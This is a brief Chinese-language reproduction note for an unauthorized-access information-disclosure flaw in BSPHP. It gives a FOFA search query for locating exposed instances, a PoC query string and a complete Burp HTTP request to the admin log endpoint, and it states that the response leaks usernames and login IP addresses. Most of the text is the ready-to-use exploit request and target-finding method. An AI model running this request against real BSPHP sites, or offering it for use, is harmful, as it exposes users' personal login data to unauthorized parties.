BSPHP 未授权访问 信息泄露漏洞复现

fofa语法:body “BSPHP”

漏洞:poc:(抓包后直接拼接到url后)

&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso&DESC=0'

burppoc:


GET /admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso&DESC=0%E2%80%98 HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: Bsphp_BSphpSeSsL_admin=sslid-admin-975d665d1e3f75ff5d0f8ba38139bab0; Bsphp_BSphpSeSsL_admin=sslid-admin-975d665d1e3f75ff5d0f8ba38139bab0
Upgrade-Insecure-Requests: 1
Priority: u=0, i

企业微信截图_17502372659954

框中可以看到泄露的用户名和登录的ip